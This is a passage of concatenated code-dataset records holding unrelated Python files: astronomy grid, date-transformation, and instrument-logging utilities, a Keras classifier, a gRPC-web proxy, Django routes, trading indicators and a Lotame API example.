[df.feh, df.Age]\n return df\n\n def hdf_filename(self, phot):\n return os.path.join(self.datadir, '{}.h5'.format(phot))\n","sub_path":"isochrones/parsec/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":4952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298284281","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/datalogue/models/transformations/time.py\n# Compiled at: 2020-04-14 15:37:55\n# Size of source mod 2**32: 7718 bytes\nfrom datalogue.models.transformations.commons import Transformation, DataType\nfrom datalogue.utils import _parse_string_list, SerializableStringEnum\nfrom datalogue.errors import _enum_parse_error, DtlError, _property_not_found, _invalid_property_type\nfrom typing import List, Union\n\nclass Period:\n\n def __init__(self, identifier: str, value: int, unit: str):\n self.identifier = identifier\n self.value = value\n self.unit = unit\n\n def __eq__(self, other: 'Period'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Period(identifier: {self.identifier}, value: {self.value}, unit: {self.unit})\"\n\n def _as_payload(self) -> dict:\n return {'identifier':self.identifier, \n 'value':self.value, \n 'unit':self.unit}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Period')]:\n identifier = json.get('identifier')\n if identifier is None:\n return _property_not_found('identifier', json)\n value = json.get('value')\n if value is None:\n return _property_not_found('value', json)\n else:\n unit = json.get('unit')\n if unit is None:\n return _property_not_found('unit', json)\n return Period(identifier, value, unit)\n\n\nclass Format:\n\n def __init__(self, start: str, end: str, separator: str):\n self.start = start\n self.end = end\n self.separator = separator\n\n def __eq__(self, other: 'Format'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Format(start: {self.start}, end: {self.end}, separator: {self.separator})\"\n\n def _as_payload(self) -> dict:\n return {'start':self.start, \n 'separator':self.separator, \n 'end':self.end}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Format')]:\n start = json.get('start')\n if start is None:\n return _property_not_found('start', json)\n separator = json.get('separator')\n if separator is None:\n return _property_not_found('separator', json)\n else:\n end = json.get('end')\n if end is None:\n return _property_not_found('end', json)\n return Format(start, end, separator)\n\n\nclass Output:\n\n def __init__(self, start_label: str, end_label: str, format: str):\n self.start_label = start_label\n self.end_label = end_label\n self.format = format\n\n def __eq__(self, other: 'Output'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"Output(start: {self.start_label}, end: {self.end_label}, separator: {self.format})\"\n\n def _as_payload(self) -> dict:\n return {'startLabel':self.start_label, \n 'endLabel':self.end_label, \n 'format':self.format}\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'Output')]:\n start_label = json.get('startLabel')\n if start_label is None:\n return _property_not_found('startLabel', json)\n end_label = json.get('endLabel')\n if end_label is None:\n return _property_not_found('endLabel', json)\n else:\n format = json.get('format')\n if format is None:\n return _property_not_found('format', json)\n return Output(start_label, end_label, format)\n\n\nclass ParseDatesAndCreatePeriodNodes(Transformation):\n type_str = 'ParseDatesAndCreatePeriodNodes'\n\n def __init__(self, path: List[str], period: Period, date_format: Format, output: Output):\n Transformation.__init__(self, ParseDatesAndCreatePeriodNodes.type_str)\n self.path = path\n self.period = period\n self.format = date_format\n self.output = output\n\n def __eq__(self, other: 'ParseDatesAndCreatePeriodNodes'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"ParseDatesAndCreatePeriodNodes(path: {self.path!r}, period: {self.period}, format: {self.format}, output: {self.output})\"\n\n def _as_payload(self) -> dict:\n base = self._base_payload()\n base['path'] = self.path\n base['period'] = self.period._as_payload()\n base['format'] = self.format._as_payload()\n base['output'] = self.output._as_payload()\n return base\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'ParseDatesAndCreatePeriodNodes')]:\n path = json.get('path')\n if path is None:\n return _property_not_found('path', json)\n path = _parse_string_list(path)\n if isinstance(path, DtlError):\n return path\n period = json.get('period')\n if period is None:\n return _property_not_found('period', json)\n period = Period._from_payload(period)\n if isinstance(period, DtlError):\n return period\n date_format = json.get('format')\n if date_format is None:\n return _property_not_found('format', json)\n date_format = Format._from_payload(date_format)\n if isinstance(date_format, DtlError):\n return date_format\n output = json.get('output')\n if output is None:\n return _property_not_found('output', json)\n else:\n output = Output._from_payload(output)\n if isinstance(output, DtlError):\n return output\n return ParseDatesAndCreatePeriodNodes(path, period, date_format, output)\n\n\nclass InterpretAsDateAndCreatePeriodNodes(Transformation):\n type_str = 'InterpretAsDateAndCreatePeriodNodes'\n\n def __init__(self, path: List[str], period: str, year: int, output: Output):\n Transformation.__init__(self, InterpretAsDateAndCreatePeriodNodes.type_str)\n self.path = path\n self.period = period\n self.year = year\n self.output = output\n\n def __eq__(self, other: 'InterpretAsDateAndCreatePeriodNodes'):\n if isinstance(self, other.__class__):\n return self._as_payload() == other._as_payload()\n else:\n return False\n\n def __repr__(self):\n return f\"InterpretAsDateAndCreatePeriodNodes(path: {self.path!r}, period: {self.period}, year: {self.year}, output: {self.output})\"\n\n def _as_payload(self) -> dict:\n base = self._base_payload()\n base['path'] = self.path\n base['period'] = self.period\n base['year'] = self.year\n base['output'] = self.output._as_payload()\n return base\n\n @staticmethod\n def _from_payload(json: dict) -> Union[(DtlError, 'InterpretAsDateAndCreatePeriodNodes')]:\n path = json.get('path')\n if path is None:\n return _property_not_found('path', json)\n path = _parse_string_list(path)\n if isinstance(path, DtlError):\n return path\n period = json.get('period')\n if period is None:\n return _property_not_found('period', json)\n year = json.get('year')\n if year is None:\n return _property_not_found('year', json)\n output = json.get('output')\n if output is None:\n return _property_not_found('output', json)\n else:\n output = Output._from_payload(output)\n if isinstance(output, DtlError):\n return output\n return InterpretAsDateAndCreatePeriodNodes(path, period, year, output)","sub_path":"pycfiles/datalogue-0.33.3-py3.6/time.cpython-36.py","file_name":"time.cpython-36.py","file_ext":"py","file_size_in_byte":8150,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"257121061","text":"from app.api import helper\nfrom app.api import Resource\nfrom app.api import datetime as dt\nfrom app.api.models import Country\nfrom app.api.models import serializer\nfrom app.api import re\n\n\nclass BaseHandler(Resource):\n DEFAULT_ERR_MSG = 'bad response from server'\n DEFAULT_STATUS_CODE = 500\n # to match: [ Province/State|Country|Region|Lat|Long|1/1/20|1/2/20 and so on ....> ]\n EXPECTED_HEADER_PATTERN = r'((P\\w+\\/S\\w+)\\|(C\\w+\\/R\\w+)\\|(L\\w+)\\|(L\\w+)\\|(\\d{1,2}\\/\\d{1,2}\\/\\d{1,4}\\|*)+)'\n\n def __init__(self, api=None):\n super(BaseHandler, self).__init__(api=api)\n self.__err = False\n self.msg = None\n self.code = None\n self.payload = None\n self.metadata = None\n self.status = None\n self.response = None\n self.data = None\n self.last_updated = None\n self.__set_defaults()\n\n def __set_defaults(self):\n self.msg = BaseHandler.DEFAULT_ERR_MSG\n self.code = BaseHandler.DEFAULT_STATUS_CODE\n self.payload = {\"error\": self.__err}\n self.metadata = {}\n self.status = 'OK'\n self.response = self.payload\n\n def __validate_headers(self):\n expected_header_pattern = BaseHandler.EXPECTED_HEADER_PATTERN\n try:\n headers_in_a_string = '|'.join(self.payload.columns)\n match_was_found = re.match(expected_header_pattern, headers_in_a_string)\n if not match_was_found:\n raise ValueError('Payload headers did not match the expected pattern.')\n except Exception as e:\n self.__err = True\n self.msg = e\n\n def __validate_data_types(self):\n try:\n raise NotImplementedError('Data type validation is not implemented yet.')\n except Exception as e:\n # self. __err = True\n self.msg = e\n\n def __validate_payload__(self):\n self.__validate_headers()\n self.__validate_data_types()\n validation_status = not self.__err\n return validation_status\n\n def __validate_response(self):\n acceptable_response_types = [\"str\", \"list\", \"dict\"]\n response_type = helper.check_data_type(self.payload)\n return response_type in acceptable_response_types\n\n def __pre_process_payload__(self):\n try:\n self.payload.fillna('', inplace=True)\n self.payload.columns = list(map(lambda x: x.lower().replace('/', '_'), self.payload.columns))\n self.payload.country_region = self.payload.country_region.apply(lambda x: str(x).lower().replace(' ', '_'))\n self.payload.province_state = self.payload.province_state.apply(lambda x: str(x).lower().replace(' ', '_'))\n except Exception as e:\n self.__err = True\n self.msg = f'Pre-processor failed: [ {e} ]'\n\n def __set_last_updated_date__(self, date):\n expected_format = '%m_%d_%y'\n self.last_updated = dt.strptime(date, expected_format)\n\n @staticmethod\n def __update_check__(category):\n update_is_needed = Country.__check_for_update__(category)\n return update_is_needed\n\n def __serialize__(self, category):\n # make payload presentable\n if self.__err:\n self.msg = f'Serialization failed because: {self.msg}'\n raise ValueError(self.msg)\n self.payload = serializer.serialize_raw_data(self.payload, category)\n\n","sub_path":"app/api/services/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"235974833","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 8 14:50:09 2017\n\n@author: Adam\n\"\"\"\nimport os\nimport codecs\nimport time\nimport re\nimport csv\nimport serial\nimport pymysql\nimport numpy as np\nfrom random import gauss\n\nUSER_DIRE = os.path.join(os.path.expanduser(\"~\"), '.emon')\nINSTRUM_FILE = os.path.join(USER_DIRE, 'instrum.ini')\n\nclass FakeInstrument(object):\n \"\"\" simulate comms. with a serial instrument\"\"\"\n def __init__(self, settings):\n self.config = settings\n self.sensors = (settings['sensors'].strip()).split(',')\n \n def read_all(self, debug=False, close=True):\n \"\"\" return fake sensor data \"\"\"\n reads = []\n for i, sen in enumerate(self.sensors):\n reads.append('%.4f'%gauss(293 + 0.5*i, 0.1))\n return reads\n \n def close(self):\n \"\"\" close connection\"\"\"\n pass\n\nclass Instrument(object):\n \"\"\" serial communication with an instrument\"\"\"\n def __init__(self, settings):\n self.settings = settings\n self.setup()\n self.sensors = (settings['sensors'].strip()).split(',')\n # format response\n if 'regex' in settings:\n self.regex = settings['regex']\n else:\n self.regex = None\n\n def setup(self):\n \"\"\" setup serial connection\"\"\"\n self.connection = serial.Serial()\n for att in ['port',\n 'baudrate',\n 'bytesize',\n 'parity',\n 'stopbits',\n 'timeout',\n 'xonxoff',\n 'rtsct',\n 'dsrdtr',\n 'write_timeout',\n 'inter_byte_timeout']:\n if att in self.settings:\n # check if int\n try:\n val = int(self.settings[att])\n except ValueError:\n val = self.settings[att]\n # update serial configuration\n setattr(self.connection, att, val)\n\n def read_all(self, debug=False, close=True):\n \"\"\" read sensor data\"\"\"\n # check connection and flush buffer\n try:\n if not self.connection.is_open:\n self.connection.open()\n self.connection.flush()\n # query instrument\n reads = []\n cmd = codecs.decode(self.settings['cmd'], 'unicode-escape')\n for sen in self.sensors:\n self.connection.flushInput()\n # parse command\n serial_cmd = cmd.replace('#', sen)\n serial_cmd = bytes(serial_cmd, 'utf8')\n if debug:\n print(serial_cmd)\n # write command, read response\n self.connection.write(serial_cmd)\n # wait for acknowledgement / send enquiry\n if 'ack' in self.settings and 'enq' in self.settings:\n # needed for maxigauge\n ack = codecs.decode(self.settings['ack'], 'unicode-escape')\n if self.connection.readline() == bytes(ack, 'utf8'):\n # send enquiry\n enq = codecs.decode(self.settings['enq'], 'unicode-escape')\n self.connection.write(bytes(enq, 'utf8'))\n else:\n raise serial.SerialException('acknowledgement error')\n response = self.connection.readline()\n if debug:\n print(response)\n # format response\n response = response.strip()\n response = response.decode(\"utf-8\")\n if self.regex is not None:\n match = re.search(self.regex, response)\n response = match.group(1)\n reads.append(response)\n if close:\n # close connection\n self.connection.close()\n return reads\n except serial.SerialException:\n return \"connection failed\"\n\n def close(self):\n \"\"\" close connection\"\"\"\n if self.connection.is_open:\n self.connection.close()\n\ndef is_float_array(vals):\n \"\"\" check if can be converted to float array\n \"\"\"\n try:\n np.array(vals, dtype=float)\n return True\n except:\n return False\n\ndef sql_check(cols, settings, debug=False):\n \"\"\" check mysql server\n \"\"\"\n mariadb_connection = pymysql.connect(host=settings['sql_host'],\n port=int(settings['sql_port']),\n user=settings['sql_user'],\n password=settings['sql_password'],\n database=settings['sql_database'])\n with mariadb_connection.cursor() as cursor:\n # check table exists\n cursor.execute(\"SHOW TABLES;\")\n tbls = np.array(cursor.fetchall()).flatten()\n if debug:\n print(tbls)\n if settings['sql_table'] not in tbls:\n error_msg = settings['sql_table'] + ' not found in ' + settings['sql_database']\n raise ValueError(error_msg)\n # check columns exist\n cursor.execute(\"SHOW COLUMNS IN `\" + settings['sql_table'] + \"`;\")\n columns = np.array(cursor.fetchall())[:, 0].astype(str)\n if debug:\n print(columns)\n for lbl in cols:\n if lbl not in columns:\n error_msg = lbl + ' not found in ' + settings['sql_database'] + '.' + settings['sql_table']\n raise ValueError(error_msg)\n return \"ok\"\n\ndef sql_insert(vals, cols, settings, validate=True, debug=False):\n \"\"\" send to mysql server\n\n INSERT INTO <>(<>) VALUES (<>);\n \"\"\"\n mariadb_connection = pymysql.connect(host=settings['sql_host'],\n port=int(settings['sql_port']),\n user=settings['sql_user'],\n password=settings['sql_password'],\n database=settings['sql_database'])\n with mariadb_connection.cursor() as cursor:\n # check values\n if validate:\n proceed = is_float_array(vals)\n else:\n proceed = True\n if proceed:\n vals = ', '.join(vals)\n cols = ', '.join(cols)\n sql = \"INSERT INTO \" + settings['sql_table'] + \"(\" + cols + \\\n \") VALUES (\" + vals + \");\"\n if debug:\n print(sql)\n cursor.execute(sql)\n mariadb_connection.commit()\n\ndef to_csv(vals, cols, settings, debug=False):\n \"\"\" save to out_dire/yyyy/fname_yyyymmdd.dat\n \"\"\"\n # build file path\n out_dire = settings['out_dire']\n fname = settings['fname']\n if 'delim' in settings:\n delim = codecs.decode(settings['delim'], 'unicode-escape')\n else:\n delim = ','\n ## time\n year = time.strftime('%Y')\n today = time.strftime('%Y%m%d')\n if not os.path.isdir(out_dire):\n raise IOError(out_dire + ' does not exist')\n ## sub directory\n sub_dire = os.path.join(out_dire, year)\n if not os.path.isdir(sub_dire):\n os.makedirs(sub_dire)\n ## file name\n fname = fname + '_' + today + '.dat'\n out_fil = os.path.join(sub_dire, fname)\n # save output\n output = vals.copy()\n timestamp = time.strftime('%Y-%m-%d %H:%M:%S')\n output.insert(0, timestamp)\n if debug:\n print(out_fil)\n print(output)\n ## header\n if not os.path.isfile(out_fil):\n header = cols.copy()\n header.insert(0, 'TIMESTAMP')\n with open(out_fil, 'w', encoding='utf8', newline='') as fil:\n writer = csv.writer(fil, delimiter=delim)\n writer.writerow(header)\n ## data\n with open(out_fil, 'a', encoding='utf8', newline='') as fil:\n writer = csv.writer(fil, delimiter=delim)\n writer.writerow(output)\n","sub_path":"emon/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":7972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"521198576","text":"from keras.wrappers.scikit_learn import KerasClassifier\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Flatten, Activation\nfrom keras.layers.convolutional import Convolution2D, ZeroPadding2D, MaxPooling2D\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom sklearn.model_selection import train_test_split\nfrom keras import backend as K\nimport numpy as np\nimport pandas as pd\n\n#K.set_image_dim_ordering('th')\n#K.set_floatx('float32')\n\nimport pandas as pd\nimport numpy as np\nnp.random.seed(17)\n\n\n''' data loading '''\nfolder_path = './data store/32x32/'\ndataType1 = np.load(folder_path+'imgToArrayType_1.npy')\ndataType2 = np.load(folder_path+'imgToArrayType_2.npy')\ndataType3 = np.load(folder_path+'imgToArrayType_3.npy')\n\ndataType1_ad = np.load(folder_path+'imgToArrayType_1_ad.npy')\ndataType2_ad = np.load(folder_path+'imgToArrayType_2_ad.npy')\ndataType3_ad = np.load(folder_path+'imgToArrayType_3_ad.npy')\n\n\nlabel1 = np.zeros((len(dataType1),), dtype = int)\nlabel2 = np.ones((len(dataType2),),dtype = int)\nlabel3 = np.ones((len(dataType3),),dtype = int) \nlabel3 += 1\n\nlabel1_ad = np.zeros((len(dataType1_ad),), dtype = int)\nlabel2_ad = np.ones((len(dataType2_ad),),dtype = int)\nlabel3_ad = np.ones((len(dataType3_ad),),dtype = int) \nlabel3_ad += 1\n\n\n\ndata = np.concatenate((dataType1,dataType1_ad,dataType2,dataType2_ad,dataType3,dataType3_ad),0)\nlabels = np.concatenate((label1,label1_ad,label2,label2_ad,label3,label3_ad),0)\ndata = data.astype('float32')\ndata = data/255\n\n\ndef create_model(opt_='adamax'):\n model = Sequential()\n model.add(Convolution2D(4, 3, 3, activation='relu', input_shape=(32, 32,3))) #use input_shape=(3, 64, 64)\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Convolution2D(8, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2), strides=(2, 2)))\n model.add(Dropout(0.2))\n \n model.add(Flatten())\n model.add(Dense(12, activation='tanh'))\n model.add(Dropout(0.1))\n model.add(Dense(3, activation='softmax'))\n\n model.compile(optimizer=opt_, loss='sparse_categorical_crossentropy', metrics=['accuracy']) \n return model\n\ndef cleanImages():\n datagen = ImageDataGenerator(rotation_range=0.3, zoom_range=0.3)\n datagen.fit(data)\n return datagen\n\ndef fitAndPredict():\n print(\"cleaning images\")\n datagen=cleanImages()\n print(\"images cleaned\")\n K.set_image_data_format = 'channels_last'\n model = create_model()\n x_train,x_val_train,y_train,y_val_train = train_test_split(data,labels,test_size=0.4, random_state=17)\n print(\"fitting data\")\n model.fit_generator(datagen.flow(x_train,y_train, batch_size=15, shuffle=True), nb_epoch=200, samples_per_epoch=len(x_train), verbose=2, \n \tvalidation_data=(x_val_train, y_val_train))\n #print(\"data fitted in model\")\n #test_data = np.load('test.npy')\n #test_id = np.load('test_id.npy')\n #print(\"creating predictions\")\n #predictions = model.predict_proba(test_data)\n #print(\"predictions made\")\n return #predictions\n\ndef createSub():\n pred=fitAndPredict()\n #print(\"creating submission file\")\n #df = pd.DataFrame(pred, columns=['Type_1','Type_2','Type_3'])\n #df['image_name'] = test_id\n #df.to_csv('submission.csv', index=False)\n #print(\"submission created\")\n\n\nif __name__ == '__main__':\n \n createSub()\n","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"126190155","text":"from torch.utils.data import DataLoader\nfrom torch.utils.data.dataset import Subset\nfrom torchvision import datasets\nfrom torchvision import transforms\nimport torch\n\ndef get_dataloader(type='cifar10', data_root='../data', batch_size=16):\n '''\n Return: train, valid and test data loader. Each loader contains (data, label) pairs\n '''\n if type is 'cifar10':\n train_indices = torch.arange(0, 48000)\n valid_indices = torch.arange(48000, 50000)\n train_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010])])\n test_transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize([0.4914, 0.4822, 0.4465], [0.2023, 0.1994, 0.2010]),])\n train_and_valid = datasets.CIFAR10(root=data_root, train=True, transform=train_transform, download=False)\n train_dataset = Subset(train_and_valid, train_indices)\n valid_dataset = Subset(train_and_valid, valid_indices)\n test_dataset = datasets.CIFAR10(root=data_root, train=False, transform=train_transform, download=False)\n train_loader = DataLoader(dataset=train_dataset, batch_size=batch_size, shuffle=True)\n valid_loader = DataLoader(dataset=valid_dataset, batch_size=batch_size, shuffle=False)\n test_loader = DataLoader(dataset=test_dataset, batch_size=batch_size, shuffle=False)\n return train_loader, valid_loader, test_loader","sub_path":"ResNet18/net/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"123184386","text":"from asyncio import Event, get_event_loop\nfrom base64 import b64encode, b64decode\nfrom functools import wraps\nfrom struct import pack, unpack\nfrom urllib.parse import urlparse\n\nimport grpc\nfrom math import ceil\nfrom quart import Quart, request\n\nUNCOMPRESSED = 0x00\nCOMPRESSED = 0x01\n\nMESSAGE = 0x00\nTRAILERS = 0x80\n\n\ndef bytes_generator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return b''.join(func(*args, **kwargs))\n return wrapper\n\n\n@bytes_generator\ndef encode(*messages):\n for message in messages:\n if isinstance(message, dict):\n message = b''.join(f'{key}:{value}\\r\\n'.encode('ascii') for key, value in message.items())\n message_type = TRAILERS\n else:\n message_type = MESSAGE\n\n compressed_flag = bytes([message_type | UNCOMPRESSED])\n message_length = pack('>I', len(message))\n yield b64encode(compressed_flag + message_length + message)\n\n\nclass StreamDecoder:\n def __init__(self, data):\n self.data = data\n self.buffer = bytearray()\n\n def __getitem__(self, idx):\n if isinstance(idx, int):\n idx = slice(idx, idx + 1, 1)\n elif idx.start and idx.start < 0:\n raise ValueError('Start must be non-negative')\n elif idx.step and idx.step < 1:\n raise ValueError('Step must be positive')\n elif not idx.stop or idx.stop < 0:\n raise ValueError('Stop must be non-negative')\n\n distance = idx.stop - len(self.buffer)\n if distance > 0:\n cutoff = 4 * ceil(distance / 3)\n data, self.data = self.data[:cutoff], self.data[cutoff:]\n self.buffer += b64decode(data)\n\n if len(data) < cutoff or len(self.buffer) < idx.stop:\n raise ValueError('Unexpected end of data')\n\n return bytes(self.buffer[idx])\n\n @property\n def has_data(self):\n return bool(self.data)\n\n def flush(self):\n self.buffer = bytearray()\n\n\ndef list_generator(func):\n @wraps(func)\n def wrapper(*args, **kwargs):\n return list(func(*args, **kwargs))\n return wrapper\n\n\n@list_generator\ndef decode(data):\n base64_decoder = StreamDecoder(data)\n while base64_decoder.has_data:\n base64_decoder.flush()\n\n compressed_flag, message_length = base64_decoder[0], base64_decoder[1:5]\n compressed_flag = compressed_flag[0]\n message_length = unpack('>I', message_length)[0]\n\n if compressed_flag == COMPRESSED:\n raise NotImplementedError\n\n message = base64_decoder[5:5 + message_length]\n if compressed_flag & TRAILERS:\n message = message.decode('ascii').rstrip()\n yield dict(entry.split(':', maxsplit=1) for entry in message.split('\\r\\n'))\n else:\n yield message\n\n\ndef cors(request_headers, allowed_origins=None):\n response_headers = {}\n\n if 'access-control-request-method' in request_headers:\n response_headers['access-control-allow-methods'] = 'POST'\n\n if 'access-control-request-headers' in request_headers:\n headers = request_headers['access-control-request-headers'].split(',')\n response_headers['access-control-allow-headers'] = ','.join(\n standard_headers() |\n grpc_headers(headers) |\n grpc_web_client_headers())\n\n if 'origin' in request_headers:\n if allowed_origins:\n origin = request_headers['origin']\n if urlparse(origin).netloc in allowed_origins:\n response_headers['access-control-allow-origin'] = origin\n else:\n response_headers['access-control-allow-origin'] = '*'\n\n response_headers['access-control-expose-headers'] = ','.join(\n grpc_headers(request_headers.keys()) |\n grpc_web_server_headers())\n response_headers['access-control-max-age'] = '600'\n\n return response_headers\n\n\ndef standard_headers():\n return {'content-type'}\n\n\ndef grpc_headers(headers):\n return {header for header in headers if header.islower()} - grpc_web_client_headers() - standard_headers()\n\n\ndef grpc_web_client_headers():\n return {'x-grpc-web',\n 'x-user-agent',\n 'x-accept-content-transfer-encoding',\n 'x-accept-response-streaming',\n 'grpc-timeout'}\n\n\ndef grpc_web_server_headers():\n return {'grpc-status',\n 'grpc-message'}\n\n\ndef proxy(target,\n credentials=None,\n options=None,\n allowed_origins=None,\n max_timeout=20,\n max_message_size=1024 * 1024 * 4):\n app = Quart('grpcio-helpers')\n if credentials:\n channel = grpc.secure_channel(target, credentials, options)\n else:\n channel = grpc.insecure_channel(target, (options or []) + [\n ('grpc.max_send_message_length', max_message_size),\n ('grpc.max_receive_message_length', max_message_size)\n ])\n\n @app.route('//', methods=['POST', 'OPTIONS'])\n async def handler(service, method):\n if request.method == 'OPTIONS':\n return b'', 204, cors(request.headers, allowed_origins)\n elif not request.headers.get('content-type', '').startswith('application/grpc'):\n return b'', 415\n\n timeout = min(float(request.headers.get('grpc-timeout', 'inf')), max_timeout)\n request_message = decode(await request.get_data())[0]\n request_metadata_keys = grpc_headers(request.headers)\n request_metadata = [(key, request.headers[key]) for key in request_metadata_keys]\n caller = channel.unary_unary(f'/{service}/{method}')\n future = caller.future(request_message, timeout=timeout, metadata=request_metadata)\n\n loop = get_event_loop()\n done = Event()\n future.add_done_callback(lambda _: loop.call_soon_threadsafe(done.set))\n await done.wait()\n\n headers = {\n **cors(request.headers, allowed_origins),\n **dict(future.initial_metadata()),\n 'content-type': 'application/grpc-web-text+proto'}\n trailers = {\n **dict(future.trailing_metadata()),\n **{'grpc-status': str(future.code().value[0]),\n 'grpc-message': future.details() or future.code().name}}\n\n if future.exception():\n return b'', 200, {**headers, **trailers}\n else:\n return encode(future.result(), trailers), 200, headers\n\n return app\n","sub_path":"grpc_helpers/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":6402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"331321783","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include # url()\nfrom django.views.generic import TemplateView\n\nfrom accounts.views import (\n login_view,\n logout_view,\n register_view,\n)\n\nfrom post.views import (\n home_view,\n tweets_list_view,\n tweets_detail_view,\n)\n\nurlpatterns = [\n path('', home_view),\n path('admin/', admin.site.urls),\n path('global/', tweets_list_view),\n path('login/', login_view),\n path('logout/', logout_view),\n path('register/', register_view),\n path('', tweets_detail_view),\n re_path(r'profiles?/', include('profiles.urls')),\n path('api/tweets/', include('post.api.urls')),\n re_path(r'api/profiles?/', include('profiles.api.urls')),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL, \n document_root=settings.STATIC_ROOT)","sub_path":"blackpost/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"462682805","text":"import pandas as pd\nimport numpy as np\nfrom functools import partial\n\n\ndef get_ATR(data, periods):\n TR = pd.DataFrame({'A': (data['high'] - data['low']),\n 'B': (data['high'] - data['close']).abs(),\n 'C': (data['low'] - data['close']).abs()\n })\n TR['TR'] = TR.max(axis=1)\n TR['ATR'] = TR['TR'].ewm(span=periods).mean()\n #TR['ATR'] = TR['TR'].rolling(periods).mean()\n return TR.ATR\n\n\ndef get_std(data, periods):\n returns = np.log(data.avg_price.pct_change()+1)\n return returns.rolling(periods).std() * data.avg_price\n\n\ndef get_min_max(data, period):\n return pd.DataFrame({\n 'max': (data - data.shift(1).rolling(period).max()) > 0,\n 'min': (data.shift(1).rolling(period).min() - data) > 0\n })\n\n\ndef majority_function(data):\n return (\n 0.5 + ((data.sum(axis=1) - 0.5) / data.count(axis=1))).apply(np.floor)\n\n\ndef get_min_max_df(data, periods, func=get_min_max):\n min_max_func = partial(func, data)\n mins = pd.DataFrame()\n maxs = pd.DataFrame()\n for period in periods:\n df = min_max_func(period)\n mins[period] = df['min']\n maxs[period] = df['max']\n return {'min': mins,\n 'max': maxs}\n\n\ndef get_signals(data, periods, func=get_min_max_df):\n min_max = func(data, periods)\n # return min_max['min']\n\n return pd.DataFrame({\n 'signal': majority_function(min_max['max']) - majority_function(min_max['min'])\n })\n","sub_path":"indicators.py","file_name":"indicators.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"531971572","text":"\"\"\"\nPython Lotame API wrapper.\n==========================\nFilename: lotame.py\nAuthor: Paulo Kuong\nEmail: pkuong80@gmail.com\nPython Version: 3.6.1\n\nPlease refer to https://api.lotame.com/docs/#/ to get all Endpoints.\nPlease refer to README (https://github.com/paulokuong/lotame) for examples.\n\"\"\"\nfrom lotame.lotame import Lotame\n\n\nif __name__ == '__main__':\n l = Lotame(username='xxxx', password='yyyy')\n\n # Search audiences\n audiences = l.get('audiences/search',\n searchTerm='Age - ').json()['Audience']\n\n # Get behavior 3333\n behavior = l.get('behaviors/{}'.format(3333)).json()\n\n # Create audience segment with 3 behaviors.\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292], [6322283, 6322292]],\n 'Testing out Lotame API 5')\n post_response_json = l.post('audiences', audience_definition).json()\n print(post_response_json)\n\n # Create audience segment with 3 behaviors for (My Profile)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]],\n 'Testing out Lotame API 5', overlap=True)\n\n # Create audience segment with 3 behaviors for (All Profile)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 5',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]],\n 'Testing out Lotame API 5', overlap=False)\n\n # Getting Reach Estimate (Note that description param is removed\n # since it is not valid param)\n audience_definition = l.get_create_audience_json(\n 'Lotame api test 8',\n 2215, [[6322283, 6322292, 1111760, 6322303],\n [6322283, 6322292, 1111760, 6322303]])\n reach_estimates = l.post(\n 'audiences/reachEstimates', audience_definition).json()\n reach_estimates_res = l.get(\n 'audiences/reachEstimates/{}'.format(reach_estimates.get('id')))\n print(reach_estimates_res.json())\n\n # Getting behaviors under hierarchy tree at depth 2 child nodes.\n [{'name': j['name'], 'behavior_id':j['behaviorId']}\n for j in l.get('hierarchies/525000', 